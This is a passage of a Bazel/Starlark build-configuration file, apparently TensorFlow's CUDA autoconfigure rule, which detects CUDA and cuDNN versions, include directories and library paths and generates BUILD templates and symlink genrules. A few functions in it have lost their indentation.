  """Compute the list of default C or C++ include directories.

  Runs the compiler in verbose preprocessing mode and scrapes the builtin
  include list that follows the "#include <...>" marker on stderr.
  """
  if lang_is_cpp:
    lang = "c++"
  else:
    lang = "c"
  # TODO: We pass -no-canonical-prefixes here to match the compiler flags,
  # but in cuda_clang CROSSTOOL file that is a `feature` and we should
  # handle the case when it's disabled and no flag is passed
  result = repository_ctx.execute([cc, "-no-canonical-prefixes",
                                   "-E", "-x" + lang, "-", "-v"])
  # The include list starts on the line after the marker...
  index1 = result.stderr.find(_INC_DIR_MARKER_BEGIN)
  if index1 == -1:
    return []
  index1 = result.stderr.find("\n", index1)
  if index1 == -1:
    return []
  # ...and every entry is indented with a space, so the last "\n " locates
  # the final entry; the slice below spans marker+1 .. end-of-last-entry.
  index2 = result.stderr.rfind("\n ")
  if index2 == -1 or index2 < index1:
    return []
  index2 = result.stderr.find("\n", index2 + 1)
  if index2 == -1:
    inc_dirs = result.stderr[index1 + 1:]
  else:
    inc_dirs = result.stderr[index1 + 1:index2].strip()
  return [str(repository_ctx.path(_cxx_inc_convert(p)))
          for p in inc_dirs.split("\n")]
def get_cxx_inc_directories(repository_ctx, cc):
  """Compute the list of default C and C++ include directories."""
  # For some reason `clang -xc` sometimes returns include paths that are
  # different from the ones from `clang -xc++`. (Symlink and a dir)
  # So we run the compiler with both `-xc` and `-xc++` and merge resulting lists
  includes_cpp = _get_cxx_inc_directories_impl(repository_ctx, cc, True)
  includes_c = _get_cxx_inc_directories_impl(repository_ctx, cc, False)
  includes_cpp_set = set(includes_cpp)
  # C++ directories first (order preserved), then C-only directories.
  return includes_cpp + [inc for inc in includes_c
                         if inc not in includes_cpp_set]
def auto_configure_fail(msg):
  """Abort the repository rule with a red 'Cuda Configuration Error' banner."""
  # ANSI escape codes: \033[0;31m = red, \033[0m = reset.
  fail("\n\033[0;31mCuda Configuration Error:\033[0m %s\n" % msg)
# END cc_configure common functions (see TODO above).
def _host_compiler_includes(repository_ctx, cc):
  """Generates the cxx_builtin_include_directory entries for gcc inc dirs.
  Args:
    repository_ctx: The repository context.
    cc: The path to the gcc host compiler.
  Returns:
    A string containing the cxx_builtin_include_directory for each of the gcc
    host compiler include directories, which can be added to the CROSSTOOL
    file.
  """
  inc_dirs = get_cxx_inc_directories(repository_ctx, cc)
  inc_entries = []
  for inc_dir in inc_dirs:
    # One CROSSTOOL entry per detected builtin include directory.
    inc_entries.append(" cxx_builtin_include_directory: \"%s\"" % inc_dir)
  return "\n".join(inc_entries)
def _cuda_include_path(repository_ctx, cuda_config):
  """Generates the cxx_builtin_include_directory entries for cuda inc dirs.
  Args:
    repository_ctx: The repository context.
    cuda_config: The CUDA config as returned by _get_cuda_config.
  Returns:
    A string containing the cxx_builtin_include_directory for each of the
    CUDA toolkit include directories, which can be added to the CROSSTOOL
    file.
  """
  nvcc_path = repository_ctx.path("%s/bin/nvcc%s" %
      (cuda_config.cuda_toolkit_path,
      ".exe" if cuda_config.cpu_value == "Windows" else ""))
  # Run nvcc verbosely on /dev/null so it prints its target directory
  # ("#$ _TARGET_DIR_=..." line) on stderr.
  result = repository_ctx.execute([nvcc_path, '-v',
      '/dev/null', '-o', '/dev/null'])
  target_dir = ""
  for one_line in result.stderr.splitlines():
    if one_line.startswith('#$ _TARGET_DIR_='):
      target_dir = (cuda_config.cuda_toolkit_path + '/' +
          one_line.replace('#$ _TARGET_DIR_=', '') + "/include")
  inc_entries = []
  if target_dir != "":
    inc_entries.append(" cxx_builtin_include_directory: \"%s\"" % target_dir)
  # Always include the toolkit's default include directory as well.
  default_include = cuda_config.cuda_toolkit_path + '/include'
  inc_entries.append(" cxx_builtin_include_directory: \"%s\"" %
      default_include)
  return "\n".join(inc_entries)
def _enable_cuda(repository_ctx):
  """Returns True iff the TF_NEED_CUDA environment variable is set to "1"."""
  if "TF_NEED_CUDA" in repository_ctx.os.environ:
    enable_cuda = repository_ctx.os.environ["TF_NEED_CUDA"].strip()
    return enable_cuda == "1"
  return False
def _cuda_toolkit_path(repository_ctx):
  """Finds the cuda toolkit directory.
  Args:
    repository_ctx: The repository context.
  Returns:
    A speculative real path of the cuda toolkit install directory.
  """
  cuda_toolkit_path = _DEFAULT_CUDA_TOOLKIT_PATH
  # CUDA_TOOLKIT_PATH overrides the default /usr/local/cuda.
  if _CUDA_TOOLKIT_PATH in repository_ctx.os.environ:
    cuda_toolkit_path = repository_ctx.os.environ[_CUDA_TOOLKIT_PATH].strip()
  if not repository_ctx.path(cuda_toolkit_path).exists:
    auto_configure_fail("Cannot find cuda toolkit path.")
  # Resolve symlinks so downstream rules see a stable path.
  return str(repository_ctx.path(cuda_toolkit_path).realpath)
def _cudnn_install_basedir(repository_ctx):
  """Finds the cudnn install directory."""
  cudnn_install_path = _DEFAULT_CUDNN_INSTALL_PATH
  # CUDNN_INSTALL_PATH overrides the default /usr/local/cuda.
  if _CUDNN_INSTALL_PATH in repository_ctx.os.environ:
    cudnn_install_path = repository_ctx.os.environ[_CUDNN_INSTALL_PATH].strip()
  if not repository_ctx.path(cudnn_install_path).exists:
    auto_configure_fail("Cannot find cudnn install path.")
  # Unlike _cuda_toolkit_path, this path is returned without realpath'ing.
  return cudnn_install_path
def _matches_version(environ_version, detected_version):
  """Weak match between a user-requested version and a detected one.

  The user may specify only a prefix of the version parts (major, or
  major.minor); the match succeeds when every part they gave equals the
  corresponding detected part.  To illustrate:
    environ_version detected_version result
    -----------------------------------------
    5.1.3           5.1.3            True
    5.1             5.1.3            True
    5               5.1              True
    5.1.3           5.1              False
    5.2.3           5.1.3            False

  Args:
    environ_version: The version specified by the user via environment
      variables.
    detected_version: The version autodetected from the CUDA installation on
      the system.
  Returns: True if user-specified version matches detected version and False
    otherwise.
  """
  wanted_parts = environ_version.split(".")
  found_parts = detected_version.split(".")
  # The user cannot request more precision than was detected.
  if len(found_parts) < len(wanted_parts):
    return False
  # zip truncates to the shorter (requested) list, so only the parts the
  # user actually specified are compared.
  for wanted, found in zip(wanted_parts, found_parts):
    if wanted != found:
      return False
  return True
_NVCC_VERSION_PREFIX = "Cuda compilation tools, release "
def _cuda_version(repository_ctx, cuda_toolkit_path, cpu_value):
  """Detects the version of CUDA installed on the system.

  Runs `nvcc --version`, parses the "Cuda compilation tools, release X, VY"
  line, and cross-checks the result against TF_CUDA_VERSION if that is set.

  Args:
    repository_ctx: The repository context.
    cuda_toolkit_path: The CUDA install directory.
    cpu_value: The name of the host operating system.
  Returns:
    String containing the major.minor CUDA version ("64_<major><minor>" on
    Windows).
  """
  # Run nvcc --version and find the line containing the CUDA version.
  nvcc_path = repository_ctx.path("%s/bin/nvcc%s" %
      (cuda_toolkit_path,
      ".exe" if cpu_value == "Windows" else ""))
  if not nvcc_path.exists:
    auto_configure_fail("Cannot find nvcc at %s" % str(nvcc_path))
  result = repository_ctx.execute([str(nvcc_path), '--version'])
  if result.stderr:
    auto_configure_fail("Error running nvcc --version: %s" % result.stderr)
  # The release line is the last line of nvcc's output.
  lines = result.stdout.splitlines()
  version_line = lines[-1]
  if version_line.find(_NVCC_VERSION_PREFIX) == -1:
    auto_configure_fail(
        "Could not parse CUDA version from nvcc --version. Got: %s" %
        result.stdout)
  # Parse the CUDA version from the line containing the CUDA version:
  # "release 8.0, V8.0.44" -> parts == ["8.0", " V8.0.44"].
  prefix_removed = version_line.replace(_NVCC_VERSION_PREFIX, '')
  parts = prefix_removed.split(",")
  if len(parts) != 2 or len(parts[0]) < 2:
    auto_configure_fail(
        "Could not parse CUDA version from nvcc --version. Got: %s" %
        result.stdout)
  full_version = parts[1].strip()
  if full_version.startswith('V'):
    full_version = full_version[1:]
  # Check whether TF_CUDA_VERSION was set by the user and fail if it does not
  # match the detected version.
  environ_version = ""
  if _TF_CUDA_VERSION in repository_ctx.os.environ:
    environ_version = repository_ctx.os.environ[_TF_CUDA_VERSION].strip()
  if environ_version and not _matches_version(environ_version, full_version):
    auto_configure_fail(
        ("CUDA version detected from nvcc (%s) does not match " +
         "TF_CUDA_VERSION (%s)") % (full_version, environ_version))
  # We only use the version consisting of the major and minor version numbers.
  version_parts = full_version.split('.')
  if len(version_parts) < 2:
    # BUG FIX: the detected version was never interpolated into this message
    # (the "%s" placeholder had no argument).
    auto_configure_fail(
        "CUDA version detected from nvcc (%s) is incomplete." % full_version)
  if cpu_value == "Windows":
    version = "64_%s%s" % (version_parts[0], version_parts[1])
  else:
    version = "%s.%s" % (version_parts[0], version_parts[1])
  return version
# #define names whose values encode the cuDNN version in cudnn.h.
_DEFINE_CUDNN_MAJOR = "#define CUDNN_MAJOR"
_DEFINE_CUDNN_MINOR = "#define CUDNN_MINOR"
_DEFINE_CUDNN_PATCHLEVEL = "#define CUDNN_PATCHLEVEL"
def _find_cuda_define(repository_ctx, cudnn_header_dir, define):
  """Returns the value of a #define in cudnn.h
  Greps through cudnn.h and returns the value of the specified #define. If the
  #define is not found, then raise an error.
  Args:
    repository_ctx: The repository context.
    cudnn_header_dir: The directory containing the cuDNN header.
    define: The #define to search for.
  Returns:
    The value of the #define found in cudnn.h.
  """
  # Confirm location of cudnn.h and grep for the line defining CUDNN_MAJOR.
  cudnn_h_path = repository_ctx.path("%s/cudnn.h" % cudnn_header_dir)
  if not cudnn_h_path.exists:
    auto_configure_fail("Cannot find cudnn.h at %s" % str(cudnn_h_path))
  result = repository_ctx.execute(["grep", "--color=never", "-E", define, str(cudnn_h_path)])
  if result.stderr:
    # BUG FIX: the file name and the error text were swapped, producing
    # messages like "Error reading <stderr text>: /path/cudnn.h".
    auto_configure_fail("Error reading %s: %s" %
                        (str(cudnn_h_path), result.stderr))
  # Parse the cuDNN major version from the line defining CUDNN_MAJOR
  lines = result.stdout.splitlines()
  if len(lines) == 0 or lines[0].find(define) == -1:
    auto_configure_fail("Cannot find line containing '%s' in %s" %
                        (define, str(cudnn_h_path)))
  # Everything after the "#define NAME " prefix is the value.
  return lines[0].replace(define, "").strip()
def _cudnn_version(repository_ctx, cudnn_install_basedir, cpu_value):
  """Detects the version of cuDNN installed on the system.
  Args:
    repository_ctx: The repository context.
    cpu_value: The name of the host operating system.
    cudnn_install_basedir: The cuDNN install directory.
  Returns:
    A string containing the version of cuDNN.
  """
  # Read major/minor/patch out of the CUDNN_* #defines in cudnn.h.
  cudnn_header_dir = _find_cudnn_header_dir(repository_ctx,
                                            cudnn_install_basedir)
  major_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
                                    _DEFINE_CUDNN_MAJOR)
  minor_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
                                    _DEFINE_CUDNN_MINOR)
  patch_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
                                    _DEFINE_CUDNN_PATCHLEVEL)
  full_version = "%s.%s.%s" % (major_version, minor_version, patch_version)
  # Check whether TF_CUDNN_VERSION was set by the user and fail if it does not
  # match the detected version.
  environ_version = ""
  if _TF_CUDNN_VERSION in repository_ctx.os.environ:
    environ_version = repository_ctx.os.environ[_TF_CUDNN_VERSION].strip()
  if environ_version and not _matches_version(environ_version, full_version):
    cudnn_h_path = repository_ctx.path("%s/include/cudnn.h" %
                                       cudnn_install_basedir)
    auto_configure_fail(
        ("cuDNN version detected from %s (%s) does not match " +
         "TF_CUDNN_VERSION (%s)") %
        (str(cudnn_h_path), full_version, environ_version))
  # We only use the major version since we use the libcudnn libraries that are
  # only versioned with the major version (e.g. libcudnn.so.5).
  version = major_version
  # Windows libraries are tagged "64_<major>".
  if cpu_value == "Windows":
    version = "64_" + version
  return version
def _compute_capabilities(repository_ctx):
  """Returns a list of strings representing cuda compute capabilities.

  Reads TF_CUDA_COMPUTE_CAPABILITIES (comma-separated "major.minor" values),
  falling back to the built-in defaults when it is unset; fails on any entry
  that is not of the form <digits>.<digits>.
  """
  if _TF_CUDA_COMPUTE_CAPABILITIES not in repository_ctx.os.environ:
    return _DEFAULT_CUDA_COMPUTE_CAPABILITIES
  capabilities_str = repository_ctx.os.environ[_TF_CUDA_COMPUTE_CAPABILITIES]
  capabilities = capabilities_str.split(",")
  for capability in capabilities:
    # Workaround for Skylark's lack of support for regex. This check should
    # be equivalent to checking:
    # if re.match("[0-9]+.[0-9]+", capability) == None:
    parts = capability.split(".")
    if len(parts) != 2 or not parts[0].isdigit() or not parts[1].isdigit():
      auto_configure_fail("Invalid compute capability: %s" % capability)
  return capabilities
def _cpu_value(repository_ctx):
  """Returns the name of the host operating system.
  Args:
    repository_ctx: The repository context.
  Returns:
    A string containing the name of the host operating system.
  """
  os_name = repository_ctx.os.name.lower()
  if os_name.startswith("mac os"):
    return "Darwin"
  if os_name.find("windows") != -1:
    return "Windows"
  # Other platforms: defer to `uname -s` (e.g. "Linux", "FreeBSD").
  result = repository_ctx.execute(["uname", "-s"])
  return result.stdout.strip()
def _is_windows(repository_ctx):
  """Returns true if the host operating system is windows."""
  # Delegates to _cpu_value, which inspects repository_ctx.os.name.
  return _cpu_value(repository_ctx) == "Windows"
def _lib_name(lib, cpu_value, version="", static=False):
  """Constructs the platform-specific name of a library.

  Args:
    lib: The name of the library, such as "cudart".
    cpu_value: The name of the host operating system.
    version: The version of the library (ignored for static and Windows).
    static: True if the library is static, False for a shared object.
  Returns:
    The platform-specific name of the library; fails on unknown platforms.
  """
  if cpu_value in ("Linux", "FreeBSD"):
    if static:
      return "lib%s.a" % lib
    suffix = ".%s" % version if version else ""
    return "lib%s.so%s" % (lib, suffix)
  if cpu_value == "Windows":
    return "%s.lib" % lib
  if cpu_value == "Darwin":
    if static:
      return "lib%s.a" % lib
    suffix = ".%s" % version if version else ""
    return "lib%s%s.dylib" % (lib, suffix)
  auto_configure_fail("Invalid cpu_value: %s" % cpu_value)
def _find_cuda_lib(lib, repository_ctx, cpu_value, basedir, version="",
                   static=False):
  """Finds the given CUDA or cuDNN library on the system.
  Args:
    lib: The name of the library, such as "cudart"
    repository_ctx: The repository context.
    cpu_value: The name of the host operating system.
    basedir: The install directory of CUDA or cuDNN.
    version: The version of the library.
    static: True if static library, False if shared object.
  Returns:
    Returns a struct with the following fields:
      file_name: The basename of the library found on the system.
      path: The full path to the library.
  """
  file_name = _lib_name(lib, cpu_value, version, static)
  # Search order (Linux): lib64, lib64/stubs, then the Debian/Ubuntu
  # multiarch directory.  Windows: lib/x64 then lib.  Fallback: basedir.
  if cpu_value == "Linux":
    path = repository_ctx.path("%s/lib64/%s" % (basedir, file_name))
    if path.exists:
      return struct(file_name=file_name, path=str(path.realpath))
    path = repository_ctx.path("%s/lib64/stubs/%s" % (basedir, file_name))
    if path.exists:
      return struct(file_name=file_name, path=str(path.realpath))
    path = repository_ctx.path(
        "%s/lib/x86_64-linux-gnu/%s" % (basedir, file_name))
    if path.exists:
      return struct(file_name=file_name, path=str(path.realpath))
  elif cpu_value == "Windows":
    path = repository_ctx.path("%s/lib/x64/%s" % (basedir, file_name))
    if path.exists:
      return struct(file_name=file_name, path=str(path.realpath))
  path = repository_ctx.path("%s/lib/%s" % (basedir, file_name))
  if path.exists:
    return struct(file_name=file_name, path=str(path.realpath))
  path = repository_ctx.path("%s/%s" % (basedir, file_name))
  if path.exists:
    return struct(file_name=file_name, path=str(path.realpath))
  auto_configure_fail("Cannot find cuda library %s" % file_name)
def _find_cupti_lib(repository_ctx, cuda_config):
  """Finds the cupti library on the system.
  On most systems, the cupti library is not installed in the same directory as
  the other CUDA libraries but rather in a special extras/CUPTI directory.
  Args:
    repository_ctx: The repository context.
    cuda_config: The cuda configuration as returned by _get_cuda_config.
  Returns:
    Returns a struct with the following fields:
      file_name: The basename of the library found on the system.
      path: The full path to the library.
  """
  file_name = _lib_name("cupti", cuda_config.cpu_value,
                        cuda_config.cuda_version)
  # Search order mirrors _find_cuda_lib but starts in extras/CUPTI.
  if cuda_config.cpu_value == "Linux":
    path = repository_ctx.path(
        "%s/extras/CUPTI/lib64/%s" % (cuda_config.cuda_toolkit_path, file_name))
    if path.exists:
      return struct(file_name=file_name, path=str(path.realpath))
    path = repository_ctx.path(
        "%s/lib/x86_64-linux-gnu/%s" % (cuda_config.cuda_toolkit_path,
                                        file_name))
    if path.exists:
      return struct(file_name=file_name, path=str(path.realpath))
  elif cuda_config.cpu_value == "Windows":
    path = repository_ctx.path(
        "%s/extras/CUPTI/libx64/%s" %
        (cuda_config.cuda_toolkit_path, file_name))
    if path.exists:
      return struct(file_name=file_name, path=str(path.realpath))
  path = repository_ctx.path(
      "%s/extras/CUPTI/lib/%s" % (cuda_config.cuda_toolkit_path, file_name))
  if path.exists:
    return struct(file_name=file_name, path=str(path.realpath))
  path = repository_ctx.path(
      "%s/lib/%s" % (cuda_config.cuda_toolkit_path, file_name))
  if path.exists:
    return struct(file_name=file_name, path=str(path.realpath))
  auto_configure_fail("Cannot find cupti library %s" % file_name)
def _find_libs(repository_ctx, cuda_config):
  """Returns the CUDA and cuDNN libraries on the system.
  Args:
    repository_ctx: The repository context.
    cuda_config: The CUDA config as returned by _get_cuda_config
  Returns:
    Map of library names to structs of filename and path as returned by
    _find_cuda_lib and _find_cupti_lib.
  """
  # CLEANUP: removed the dead locals `cudnn_version`/`cudnn_ext` — the
  # computed ".<version>" extension was never used anywhere below.
  cpu_value = cuda_config.cpu_value
  return {
      "cuda": _find_cuda_lib("cuda", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path),
      "cudart": _find_cuda_lib(
          "cudart", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
          cuda_config.cuda_version),
      "cudart_static": _find_cuda_lib(
          "cudart_static", repository_ctx, cpu_value,
          cuda_config.cuda_toolkit_path, cuda_config.cuda_version, static=True),
      "cublas": _find_cuda_lib(
          "cublas", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
          cuda_config.cuda_version),
      "cusolver": _find_cuda_lib(
          "cusolver", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
          cuda_config.cuda_version),
      "curand": _find_cuda_lib(
          "curand", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
          cuda_config.cuda_version),
      "cufft": _find_cuda_lib(
          "cufft", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
          cuda_config.cuda_version),
      "cudnn": _find_cuda_lib(
          "cudnn", repository_ctx, cpu_value, cuda_config.cudnn_install_basedir,
          cuda_config.cudnn_version),
      "cupti": _find_cupti_lib(repository_ctx, cuda_config),
  }
def _find_cudnn_header_dir(repository_ctx, cudnn_install_basedir):
  """Returns the path to the directory containing cudnn.h
  Args:
    repository_ctx: The repository context.
    cudnn_install_basedir: The cudnn install directory as returned by
      _cudnn_install_basedir.
  Returns:
    The path of the directory containing the cudnn header.
  """
  # Search order: the basedir itself, basedir/include, then /usr/include.
  if repository_ctx.path(cudnn_install_basedir + "/cudnn.h").exists:
    return cudnn_install_basedir
  if repository_ctx.path(cudnn_install_basedir + "/include/cudnn.h").exists:
    return cudnn_install_basedir + "/include"
  if repository_ctx.path("/usr/include/cudnn.h").exists:
    return "/usr/include"
  auto_configure_fail("Cannot find cudnn.h under %s" % cudnn_install_basedir)
def _find_cudnn_lib_path(repository_ctx, cudnn_install_basedir, symlink_files):
  """Returns the path to the directory containing libcudnn
  Args:
    repository_ctx: The repository context.
    cudnn_install_basedir: The cudnn install dir as returned by
      _cudnn_install_basedir.
    symlink_files: The symlink files as returned by _cuda_symlink_files.
  Returns:
    The path of the directory containing the cudnn libraries.
  """
  # Try the primary lib location first, then the alternate one.
  lib_dir = cudnn_install_basedir + "/" + symlink_files.cuda_dnn_lib
  if repository_ctx.path(lib_dir).exists:
    return lib_dir
  alt_lib_dir = cudnn_install_basedir + "/" + symlink_files.cuda_dnn_lib_alt
  if repository_ctx.path(alt_lib_dir).exists:
    return alt_lib_dir
  auto_configure_fail("Cannot find %s or %s under %s" %
       (symlink_files.cuda_dnn_lib, symlink_files.cuda_dnn_lib_alt,
        cudnn_install_basedir))
def _cudart_static_linkopt(cpu_value):
  """Returns additional platform-specific linkopts for cudart.

  Darwin needs no extra flag; everywhere else librt is linked in.
  """
  if cpu_value == "Darwin":
    return ""
  return "\"-lrt\","
def _get_cuda_config(repository_ctx):
  """Detects and returns information about the CUDA installation on the system.
  Args:
    repository_ctx: The repository context.
  Returns:
    A struct containing the following fields:
      cuda_toolkit_path: The CUDA toolkit installation directory.
      cudnn_install_basedir: The cuDNN installation directory.
      cuda_version: The version of CUDA on the system.
      cudnn_version: The version of cuDNN on the system.
      compute_capabilities: A list of the system's CUDA compute capabilities.
      cpu_value: The name of the host operating system.
  """
  # Aggregate all the individual detection helpers into one struct.
  cpu_value = _cpu_value(repository_ctx)
  cuda_toolkit_path = _cuda_toolkit_path(repository_ctx)
  cuda_version = _cuda_version(repository_ctx, cuda_toolkit_path, cpu_value)
  cudnn_install_basedir = _cudnn_install_basedir(repository_ctx)
  cudnn_version = _cudnn_version(repository_ctx, cudnn_install_basedir, cpu_value)
  return struct(
      cuda_toolkit_path = cuda_toolkit_path,
      cudnn_install_basedir = cudnn_install_basedir,
      cuda_version = cuda_version,
      cudnn_version = cudnn_version,
      compute_capabilities = _compute_capabilities(repository_ctx),
      cpu_value = cpu_value)
def _tpl(repository_ctx, tpl, substitutions=None, out=None):
  """Instantiates a template from //third_party/gpus into the repository.

  Args:
    repository_ctx: The repository context.
    tpl: template path relative to //third_party/gpus, with ":" separating
      package and file; ":" is replaced by "/" for the default output path.
    substitutions: optional dict of placeholder -> replacement strings.
    out: optional output path; defaults to the template path itself.
  """
  # Avoid a shared mutable default argument; None means "no substitutions".
  if substitutions == None:
    substitutions = {}
  if not out:
    out = tpl.replace(":", "/")
  repository_ctx.template(
      out,
      Label("//third_party/gpus/%s.tpl" % tpl),
      substitutions)
def _file(repository_ctx, label):
  """Copies a file from //third_party/gpus into the repository verbatim."""
  out_path = label.replace(":", "/")
  # An empty substitution dict makes template() act as a plain copy.
  repository_ctx.template(
      out_path,
      Label("//third_party/gpus/%s.tpl" % label),
      {})
_DUMMY_CROSSTOOL_BZL_FILE = """
def error_gpu_disabled():
fail("ERROR: Building with --config=cuda but TensorFlow is not configured " +
"to build with GPU support. Please re-run ./configure and enter 'Y' " +
"at the prompt to build with GPU support.")
native.genrule(
name = "error_gen_crosstool",
outs = ["CROSSTOOL"],
cmd = "echo 'Should not be run.' && exit 1",
)
native.filegroup(
name = "crosstool",
srcs = [":CROSSTOOL"],
output_licenses = ["unencumbered"],
)
"""
_DUMMY_CROSSTOOL_BUILD_FILE = """
load("//crosstool:error_gpu_disabled.bzl", "error_gpu_disabled")
error_gpu_disabled()
"""
def _create_dummy_repository(repository_ctx):
  """Populates the repository with stubs so non-CUDA builds still resolve.

  Generates a BUILD file with CUDA marked unconfigured, empty placeholder
  headers and libraries, and a crosstool that fails with an actionable error
  message if the user builds with --config=cuda anyway.
  """
  cpu_value = _cpu_value(repository_ctx)
  # Set up BUILD file for cuda/.
  _tpl(repository_ctx, "cuda:build_defs.bzl",
       {
           "%{cuda_is_configured}": "False",
           "%{cuda_extra_copts}": "[]"
       })
  _tpl(repository_ctx, "cuda:BUILD",
       {
           "%{cuda_driver_lib}": _lib_name("cuda", cpu_value),
           "%{cudart_static_lib}": _lib_name("cudart_static", cpu_value,
                                             static=True),
           "%{cudart_static_linkopt}": _cudart_static_linkopt(cpu_value),
           "%{cudart_lib}": _lib_name("cudart", cpu_value),
           "%{cublas_lib}": _lib_name("cublas", cpu_value),
           "%{cusolver_lib}": _lib_name("cusolver", cpu_value),
           "%{cudnn_lib}": _lib_name("cudnn", cpu_value),
           "%{cufft_lib}": _lib_name("cufft", cpu_value),
           "%{curand_lib}": _lib_name("curand", cpu_value),
           "%{cupti_lib}": _lib_name("cupti", cpu_value),
           "%{cuda_include_genrules}": '',
           "%{cuda_headers}": '',
       })
  # Create dummy files for the CUDA toolkit since they are still required by
  # tensorflow/core/platform/default/build_config:cuda.
  repository_ctx.file("cuda/cuda/include/cuda.h", "")
  repository_ctx.file("cuda/cuda/include/cublas.h", "")
  repository_ctx.file("cuda/cuda/include/cudnn.h", "")
  repository_ctx.file("cuda/cuda/extras/CUPTI/include/cupti.h", "")
  # Empty library stubs, one per library referenced by the BUILD file above.
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cuda", cpu_value))
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cudart", cpu_value))
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cudart_static", cpu_value))
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cublas", cpu_value))
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cusolver", cpu_value))
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cudnn", cpu_value))
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("curand", cpu_value))
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cufft", cpu_value))
  repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cupti", cpu_value))
  # Set up cuda_config.h, which is used by
  # tensorflow/stream_executor/dso_loader.cc.
  _tpl(repository_ctx, "cuda:cuda_config.h",
       {
           "%{cuda_version}": _DEFAULT_CUDA_VERSION,
           "%{cudnn_version}": _DEFAULT_CUDNN_VERSION,
           "%{cuda_compute_capabilities}": ",".join([
               "CudaVersion(\"%s\")" % c
               for c in _DEFAULT_CUDA_COMPUTE_CAPABILITIES]),
           "%{cuda_toolkit_path}": _DEFAULT_CUDA_TOOLKIT_PATH,
       }, "cuda/cuda/cuda_config.h")
  # If cuda_configure is not configured to build with GPU support, and the user
  # attempts to build with --config=cuda, add a dummy build rule to intercept
  # this and fail with an actionable error message.
  repository_ctx.file("crosstool/error_gpu_disabled.bzl",
                      _DUMMY_CROSSTOOL_BZL_FILE)
  repository_ctx.file("crosstool/BUILD", _DUMMY_CROSSTOOL_BUILD_FILE)
def _execute(repository_ctx, cmdline, error_msg=None, error_details=None,
             empty_stdout_fine=False):
  """Runs a shell command and fails the configuration on error output.

  Args:
    repository_ctx: the repository_ctx object
    cmdline: list of strings, the command to execute
    error_msg: string, a summary of the error if the command fails
    error_details: string, details about the error or steps to fix it
    empty_stdout_fine: bool, if True, an empty stdout result is fine, otherwise
      it's an error
  Return:
    the result of repository_ctx.execute(cmdline)
  """
  result = repository_ctx.execute(cmdline)
  # Any stderr output, or an unexpectedly empty stdout, is treated as failure.
  if result.stderr or not (empty_stdout_fine or result.stdout):
    summary = error_msg.strip() if error_msg else "Repository command failed"
    details = error_details if error_details else ""
    auto_configure_fail("\n".join([summary, result.stderr.strip(), details]))
  return result
def _norm_path(path):
"""Returns a path with '/' and remove the trailing slash."""
path = path.replace("\\", "/")
if path[-1] == "/":
path = path[:-1]
return path
def _symlink_genrule_for_dir(repository_ctx, src_dir, dest_dir, genrule_name,
                             src_files = [], dest_files = []):
  """Returns a genrule to symlink(or copy if on Windows) a set of files.

  If src_dir is passed, files will be read from the given directory; otherwise
  we assume files are in src_files and dest_files.

  NOTE(review): the mutable list defaults are only rebound, never mutated, so
  they are safe here, but None defaults would be more conventional.
  """
  if src_dir != None:
    src_dir = _norm_path(src_dir)
    dest_dir = _norm_path(dest_dir)
    files = _read_dir(repository_ctx, src_dir)
    # Create a list with the src_dir stripped to use for outputs.
    dest_files = files.replace(src_dir, '').splitlines()
    src_files = files.splitlines()
  command = []
  if not _is_windows(repository_ctx):
    # We clear folders that might have been generated previously to avoid
    # undesired inclusions
    command.append('if [ -d "$(@D)/extras" ]; then rm $(@D)/extras -drf; fi')
    command.append('if [ -d "$(@D)/include" ]; then rm $(@D)/include -drf; fi')
    command.append('if [ -d "$(@D)/lib" ]; then rm $(@D)/lib -drf; fi')
    command.append('if [ -d "$(@D)/nvvm" ]; then rm $(@D)/nvvm -drf; fi')
  outs = []
  for i in range(len(dest_files)):
    if dest_files[i] != "":
      # If we have only one file to link we do not want to use the dest_dir, as
      # $(@D) will include the full path to the file.
      dest = '$(@D)/' + dest_dir + dest_files[i] if len(dest_files) != 1 else '$(@D)/' + dest_files[i]
      # On Windows, symlink is not supported, so we just copy all the files.
      cmd = 'cp -f' if _is_windows(repository_ctx) else 'ln -s'
      command.append(cmd + ' "%s" "%s"' % (src_files[i] , dest))
      outs.append(' "' + dest_dir + dest_files[i] + '",')
  genrule = _genrule(src_dir, genrule_name, " && ".join(command),
                     "\n".join(outs))
  return genrule
def _genrule(src_dir, genrule_name, command, outs):
"""Returns a string with a genrule.
Genrule executes the given command and produces the given outputs.
"""
return (
'genrule(\n' +
' name = "' +
genrule_name + '",\n' +
' outs = [\n' +
outs +
'\n ],\n' +
' cmd = """\n' +
command +
'\n """,\n' +
')\n'
)
def _read_dir(repository_ctx, src_dir):
  """Returns a string with all files in a directory.

  Finds all files inside a directory, traversing subfolders and following
  symlinks. The returned string contains the full path of all files
  separated by line breaks.
  """
  if not _is_windows(repository_ctx):
    # POSIX: `find -follow` already emits one path per line.
    find_result = _execute(
        repository_ctx, ["find", src_dir, "-follow", "-type", "f"],
        empty_stdout_fine=True)
    return find_result.stdout
  # Windows: `dir /b /s /a-d` lists files recursively; backslashes are
  # normalized because the paths end up in genrule outs.
  find_result = _execute(
      repository_ctx,
      ["cmd.exe", "/c", "dir", src_dir.replace("/", "\\"), "/b", "/s", "/a-d"],
      empty_stdout_fine=True)
  return find_result.stdout.replace("\\", "/")
def _use_cuda_clang(repository_ctx):
if "TF_CUDA_CLANG" in repository_ctx.os.environ:
enable_cuda = repository_ctx.os.environ["TF_CUDA_CLANG"].strip()
return enable_cuda == "1"
return False
def _compute_cuda_extra_copts(repository_ctx, compute_capabilities):
  """Returns a string list-literal of extra copts for CUDA compilation."""
  if not _use_cuda_clang(repository_ctx):
    # Capabilities are handled in the "crosstool_wrapper_driver_is_not_gcc"
    # for nvcc, so no extra copts are needed in that case.
    return str([])
  flags = []
